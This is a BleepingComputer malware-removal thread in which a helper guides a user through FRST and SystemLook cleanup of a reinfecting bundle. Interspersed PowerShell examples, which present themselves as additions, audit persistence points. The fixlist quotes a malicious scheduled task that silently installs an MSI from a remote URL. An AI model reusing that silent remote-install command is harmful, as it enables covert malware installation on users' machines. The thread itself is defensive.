Folders/files containing winsap.dll and snare.msi return after disinfection


This topic is locked
18 replies to this topic

#1 1dj
  • Members
  • 9 posts
  • OFFLINE

Posted 28 April 2017 - 09:13 PM

So I was an idiot last week and ran this setup.exe program from Mediafire. It seems this program had been bundled with all this malware/viruses. Now I've used a few antivirus programs like Zam, CCleaner, Malwarebytes, Kaspersky, which all removed most of the adware/PUPs.

However I'm up to the point now where it seems there is still something left on my computer. Kaspersky is continually deleting some files which appear in C:/<folder> and C:/Program Files/<folder>, as can be seen here http://i.imgur.com/Pf01Q2H.png (Kaspersky report) or here http://i.imgur.com/6kN01iQ.png (one of the folders which keeps coming back when I restart Windows).

These files keep on coming back when I restart Windows to "disinfect my computer". I've completed rootkit scans and full scans from Kaspersky and they are not detecting anything.
 
 


#2 1dj
  • Topic Starter
  • Members
  • 9 posts
  • OFFLINE

Posted 28 April 2017 - 10:33 PM

After running some programs before, here are the logs from them. I will also note that it seems that when I click my Chrome shortcut in the taskbar, it opens up a new instance of Chrome which is not pinned on the taskbar. Reinstalling Chrome will fix this until a restart, where it will do this again.

Edited by 1dj, 28 April 2017 - 10:38 PM.


#3 nasdaq
  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 29 April 2017 - 08:33 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows logo key + R on your keyboard at the same time. This will open the Run box.
Type Notepad and click the OK button.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-2833979337-2780947661-2915321693-1001\...\Run: [Windows Defender] => -
ShellExecuteHooks: No Name - {A950E7F8-2366-11E7-B493-64006A5CFC23} - C:\Users\danie\AppData\Roaming\Anerliphgricied\Pherrasy.dll -> No File
CHR Profile: C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-04-29] <==== ATTENTION
CHR Extension: (EditThisCookie) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2016-12-08]
CHR Extension: (Popup Blocker Pro) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\kiodaajmphnkcajieajajinghpejdjai [2017-01-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-12]
CHR Extension: (Chrome Media Router) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-26]
S2 AdBlockerService; C:\Program Files (x86)\AdBlocker\AdBlockerService.exe [X]
S2 HKClipSvc; C:\Program Files (x86)\Hotkey\Driver\x64\HKClipSvc.exe [X]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S2 PowerBiosServer; "C:\Program Files (x86)\Hotkey\HotkeyService.exe" [X]
Task: {03244A71-F0F7-4EEE-9B53-74CF550632A6} - \Microsoft\Windows\Media Center\RegisterObject -> No File <==== ATTENTION
Task: {5BBC0DE0-3D6D-43D4-A9E3-24D9E7761BF2} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=SanDiskXSD8SN8U512G1122_162304427574&d=20170426 /q <==== ATTENTION
Task: {6F2AC8EF-04FB-415C-A9A5-C6252B20BA83} - \QMC Reader for VAB -> No File <==== ATTENTION
Task: {701B2478-32EB-4392-A59B-E66E1FA91CC9} - \Prezoph -> No File <==== ATTENTION

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Reset Chrome...
Open Google Chrome, click on the menu icon which is located at the top right of Google Chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after the update you can remove the old versions of Java via the Control Panel > Programs > Programs and Features.
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
===

Please let me know what problem persists with this computer.


p.s.

Reinstalling Chrome will fix this until a restart, where it will do this again.


Are you Syncing your Chrome account?
That may be the reason that the problem returned.
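The fixlist in the post above targets four kinds of autostart entries: a Run value with no target (shown as "=> -"), a ShellExecuteHooks CLSID whose DLL is gone, services whose image file no longer exists (the [X] marker), and scheduled tasks, one of which runs msiexec.exe /i against a CloudFront URL with /q. That last one is a silent MSI install fetched over HTTP each time the task fires, so whatever the server returns is re-installed on every trigger, which is the kind of entry to look for when files keep coming back after removal. The PowerShell below is an added example for this thread, not part of the original post, of FRST, or of any product; it enumerates the same four persistence points on a live machine so they can be checked before and after the fix. It assumes an elevated session on Windows 8 or later (the ScheduledTasks module), that FRST's "hxxp" is simply defanged "http", and the function names are my own.

```powershell
# Added example, not from the thread or from FRST. Run in an elevated PowerShell
# on Windows 8+ (needs the ScheduledTasks module). Read-only: it lists, it does not remove.

# 1. Scheduled tasks whose action runs msiexec with a URL argument.
#    "msiexec.exe /i http://host/x.msi /q" downloads and installs silently every time the task fires.
function Get-RemoteMsiTask {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            # Only Exec actions expose Execute/Arguments; COM-handler actions return $null here.
            if ($action.Execute -and $action.Execute -match 'msiexec' -and
                $action.Arguments -match 'https?://') {
                [pscustomobject]@{
                    TaskPath  = $task.TaskPath
                    TaskName  = $task.TaskName
                    State     = $task.State
                    Execute   = $action.Execute
                    Arguments = $action.Arguments
                }
            }
        }
    }
}

# 2. Run values under HKCU and HKLM (FRST prints an empty target as "=> -").
function Get-RunValue {
    $keys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        $key = Get-Item $k
        foreach ($name in $key.GetValueNames()) {
            [pscustomobject]@{ Key = $k; Name = $name; Command = [string]$key.GetValue($name) }
        }
    }
}

# 3. ShellExecuteHooks: each CLSID's in-process server DLL is loaded into every process
#    that calls ShellExecute, so a hook whose DLL is missing or unfamiliar deserves attention.
function Get-ShellExecuteHook {
    $hookKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks',
                'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks'
    foreach ($hk in $hookKeys) {
        if (-not (Test-Path $hk)) { continue }
        foreach ($clsid in (Get-Item $hk).GetValueNames()) {
            $server = "Registry::HKEY_CLASSES_ROOT\CLSID\${clsid}\InprocServer32"
            $dll = if (Test-Path $server) { [string](Get-Item $server).GetValue('') } else { '' }
            $exists = $dll -and (Test-Path -LiteralPath ([Environment]::ExpandEnvironmentVariables($dll)))
            [pscustomobject]@{ Hive = $hk; CLSID = $clsid; Dll = $dll; DllExists = [bool]$exists }
        }
    }
}

# 4. Services whose image file no longer exists (what FRST marks with [X]).
#    Kernel drivers live in Win32_SystemDriver and are not covered here.
function Get-OrphanedService {
    Get-CimInstance Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }   # 'return' inside ForEach-Object skips to the next object
        # Heuristic split of image path from arguments: quoted path, else first token.
        # Unquoted paths containing spaces will be mis-split and appear as false positives.
        $exe = if ($path -match '^"([^"]+)"') { $Matches[1] } else { ($path -split ' ')[0] }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        if (-not (Test-Path -LiteralPath $exe)) {
            [pscustomobject]@{ Name = $_.Name; StartMode = $_.StartMode; PathName = $path }
        }
    }
}

Get-RemoteMsiTask    | Format-List
Get-RunValue         | Format-Table -AutoSize
Get-ShellExecuteHook | Format-Table -AutoSize
Get-OrphanedService  | Format-Table -AutoSize

# Once a task is confirmed malicious, remove it (review the listing first):
#   Get-RemoteMsiTask | ForEach-Object {
#       Unregister-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Confirm:$false }
```

Run it once before applying the fixlist and once after the reboot: a task, hook or service that reappears between the two runs is being re-created by something the fix did not reach, which is the same reasoning that leads to the file-name searches later in this thread.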

#4 1dj
  • Topic Starter
  • Members
  • 9 posts
  • OFFLINE

Posted 29 April 2017 - 09:25 AM

[Quoting nasdaq's post #3 in full.]

Hello, thanks a lot for that.

 

It seems so far good!

Ill let you know how I go and if I still see any issues.

 

EDIT: I'm seeing in my task manager this program called Windows® update with a random process name, is this concerning?

http://i.imgur.com/8DWDDgY.png (This screenshot has a different process name to the random one I saw before)

Edited by 1dj, 29 April 2017 - 09:31 AM.


#5 nasdaq
  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 30 April 2017 - 08:07 AM


Msiexec is an important program from Microsoft, nothing to worry about.

https://technet.microsoft.com/en-us/library/bb490936.aspx
===

==================== Restore Points =========================

The Windows Update files are assigned by Microsoft, nothing to worry about.
If you look at your Restore points in the Addition.txt file you will see when they are installed.

15-04-2017 00:24:54 Windows Update
19-04-2017 00:02:11 Windows Update
22-04-2017 22:52:11 Windows Update
25-04-2017 23:25:19 Windows Update
29-04-2017 00:34:33 Windows Update


===

If all is well.

To learn more about how to protect yourself while on the internet, read this little guide on best security practices to keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
===

#6 1dj
  • Topic Starter
  • Members
  • 9 posts
  • OFFLINE

Posted 30 April 2017 - 09:47 AM

I've completely reset Chrome and uninstalled and reinstalled it, and it still is spawning processes which are not pinned to the taskbar about 30 minutes after using it. I haven't synced with my account so I have no idea what's causing it.
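When a pinned Chrome shortcut keeps opening a separate, unpinned window even after a reinstall, and the FRST log earlier in the thread flagged a non-default profile directory (User Data\ChromeDefaultData rather than Chrome's usual User Data\Default), the practical check is what each Chrome shortcut actually launches and which profile directories exist. The snippet below is an added example, not part of the thread; it reads the target and arguments of every Chrome .lnk in the taskbar pins, Start Menu and Desktop through the WScript.Shell COM object, and lists the profile directories under User Data. The flags it marks for review (--user-data-dir, --load-extension, a URL in the arguments) are my assumption about what would be worth a second look; the thread does not show what, if anything, was in these shortcuts.

```powershell
# Added example, not from the thread. Lists what every Chrome shortcut launches and which
# profile directories exist under User Data. Read-only.

$wsh = New-Object -ComObject WScript.Shell

# Shortcut locations: taskbar pins, per-user and all-users Start Menu, both Desktops.
$shortcutDirs = @(
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs",
    [Environment]::GetFolderPath('Desktop'),
    [Environment]::GetFolderPath('CommonDesktopDirectory')
)

function Get-ChromeShortcut {
    foreach ($dir in $shortcutDirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $lnk = $wsh.CreateShortcut($_.FullName)   # loads the existing .lnk
            if ($lnk.TargetPath -match 'chrome\.exe$') {
                [pscustomobject]@{
                    Shortcut      = $_.FullName
                    Target        = $lnk.TargetPath
                    Arguments     = $lnk.Arguments   # a clean Chrome shortcut normally has none
                    # Assumption: these are the arguments worth reviewing, not something the thread shows.
                    FlagsToReview = [bool]($lnk.Arguments -match 'user-data-dir|load-extension|https?://')
                }
            }
        }
    }
}

# Chrome's default profile is "User Data\Default"; FRST flagged "ChromeDefaultData".
# Any directory holding a Preferences file is a profile Chrome can be pointed at.
function Get-ChromeProfileDir {
    $userData = "$env:LOCALAPPDATA\Google\Chrome\User Data"
    if (-not (Test-Path -LiteralPath $userData)) { return }
    Get-ChildItem -LiteralPath $userData -Directory |
        Where-Object { Test-Path -LiteralPath (Join-Path $_.FullName 'Preferences') } |
        Select-Object Name, CreationTime, LastWriteTime, FullName
}

Get-ChromeShortcut   | Format-List
Get-ChromeProfileDir | Format-Table -AutoSize
```

A shortcut whose Arguments column is empty and whose Target is the installed chrome.exe is what a fresh install creates; anything else in that column, or a profile directory you did not create, is what to compare against the FRST log.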



#7 nasdaq
  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 30 April 2017 - 12:44 PM




Download the SystemLook appropriate for your system.

SystemLook.exe
SystemLook_x64.exe
  • Double-click SystemLook.exe/SystemLook_x64.exe to run it.
  • Copy and paste the content of the following bold text into the main textfield:
    :reg
    winsap.dll;snare.msi
    :file
    winsap.dll;snare.msi
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
  • Note: The log can also be found on your Desktop entitled SystemLook.txt.
===




#8 1dj
  • Topic Starter
  • Members
  • 9 posts
  • OFFLINE

Posted 01 May 2017 - 05:44 AM

SystemLook 30.07.11 by jpshortstuff
Log created at 20:44 on 01/05/2017 by danie
Administrator - Elevation successful
 
========== reg ==========
 
[winsap.dll;snare.msi]
Hive unrecognized.
 
========== file ==========
 
winsap.dll;snare.msi - Unable to find/read file.
 
-= EOF =-


#9 nasdaq
  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 01 May 2017 - 07:05 AM


Let's try two searches, one for the Registry and the other for the files.

For the registry search hit the Registry Search button with

:reg
winsap.dll;snare.msi

Then for the files hit the File Search button with

:file
winsap.dll;snare.msi


#10 1dj
  • Topic Starter
  • Members
  • 9 posts
  • OFFLINE

Posted 01 May 2017 - 08:31 AM

Lets try two searches, one for the Registry and the other the the files.

For the registry search hit the Registry Search button with

:reg
winsap.dll;snare.msi

Then for the files hit the File Search button with

:file
winsap.dll;snare.msi

Where do I put this? Also [b] ?

Edited by nasdaq, 01 May 2017 - 12:01 PM.


#11 nasdaq
  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 01 May 2017 - 12:09 PM

sorry the b in the bracket was a format error. I corrected it.


Copy this command in the Text field of the SystemLook box and click the Registry button.
:reg
winsap.dll;snare.msi


Save the results.

Do another search.

Copy this command in the Text field and click the File Search button.
:file
winsap.dll;snare.msi


Save the results also.


Post both of the results.

Edited by nasdaq, 10 May 2017 - 07:40 AM.


#12 1dj
  • Topic Starter
  • Members
  • 9 posts
  • OFFLINE

Posted 01 May 2017 - 08:25 PM

There are only the buttons "Look" and "Exit".

Though after putting in the text field here are the results

 
SystemLook 30.07.11 by jpshortstuff
Log created at 11:24 on 02/05/2017 by danie
Administrator - Elevation successful
 
 
========== file ==========
 
winsap.dll;snare.msi - Unable to find/read file.
 
-= EOF =-
SystemLook 30.07.11 by jpshortstuff
Log created at 11:25 on 02/05/2017 by danie
Administrator - Elevation successful
 
========== reg ==========
 
[winsap.dll;snare.msi]
Hive unrecognized.
 
-= EOF =-
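Both SystemLook runs above came back empty ("Hive unrecognized" for the registry section, "Unable to find/read file" for the file section), which does not by itself say whether winsap.dll and snare.msi are gone or merely were not matched. The PowerShell below is an added example for this thread, not part of the original posts or of SystemLook, that searches for the two names independently: every drive letter for files with those exact names, every key and value under HKLM and HKCU for those strings, and the Uninstall keys for MSI products installed from a remote source (a silently installed MSI leaves an uninstall record even after the .msi file itself is deleted). It assumes an elevated session; the registry walk takes a few minutes. The function names are mine.

```powershell
# Added example, not from the thread. Exhaustive search for the two file names reported
# by Kaspersky and FRST; read-only and slow (minutes) because it walks the whole registry.
$names   = @('winsap.dll', 'snare.msi')
$pattern = ($names | ForEach-Object { [regex]::Escape($_) }) -join '|'

# 1. File system: every drive letter, hidden and system files included.
function Find-NamedFile {
    Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Root -match '^[A-Z]:\\$' } | ForEach-Object {
        Get-ChildItem -LiteralPath $_.Root -Recurse -Force -File -ErrorAction SilentlyContinue |
            Where-Object { $names -contains $_.Name } |
            Select-Object FullName, Length, CreationTime, LastWriteTime
    }
}

# 2. Registry: key names, value names and value data under HKLM/HKCU that mention either name.
#    A hit points at the entry (service, task, uninstall record, handler) that references the file.
function Find-RegistryMention {
    foreach ($hive in 'HKLM:\', 'HKCU:\') {
        Get-ChildItem -Path $hive -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_
            if ($key.PSChildName -match $pattern) {
                [pscustomobject]@{ Key = $key.Name; Value = '<key name>'; Data = '' }
            }
            foreach ($vn in $key.GetValueNames()) {
                $data = [string]$key.GetValue($vn)   # multi-string/binary values are flattened to text
                if ($vn -match $pattern -or $data -match $pattern) {
                    [pscustomobject]@{ Key = $key.Name; Value = $vn; Data = $data }
                }
            }
        }
    }
}

# 3. Installed products: an MSI installed by "msiexec /i <url> /q" records its source here.
function Find-InstalledProduct {
    $uninst = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
              'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall',
              'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
    foreach ($u in $uninst) {
        if (-not (Test-Path $u)) { continue }
        Get-ChildItem $u | ForEach-Object {
            $p = Get-ItemProperty $_.PSPath
            [pscustomobject]@{
                DisplayName   = $p.DisplayName
                InstallDate   = $p.InstallDate
                InstallSource = $p.InstallSource   # a URL or temp path here is worth a look
                Uninstall     = $p.UninstallString
            }
        } | Where-Object { $_.DisplayName -or $_.InstallSource }
    }
}

Find-NamedFile        | Format-Table -AutoSize
Find-RegistryMention  | Format-List
Find-InstalledProduct | Sort-Object InstallDate -Descending | Format-Table -AutoSize
```

If the file search is empty but the registry search returns a service, task or uninstall entry naming either file, that entry is the thing to hand back to the helper, since it is what will recreate the file on the next boot.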


#13 nasdaq
  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 02 May 2017 - 07:46 AM

Do you still have problems with the files I was looking for?

 

What are the remaining issues?



#14 nasdaq
  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 08 May 2017 - 07:35 AM

Are you still with me?

#15 1dj
  • Topic Starter
  • Members
  • 9 posts
  • OFFLINE

Posted 10 May 2017 - 06:50 AM

Are you still with me?

Yes I am, sorry.

 

It seems that every 3 days or so Chrome detaches itself from the pinned process and creates a new process which I have to re-pin.





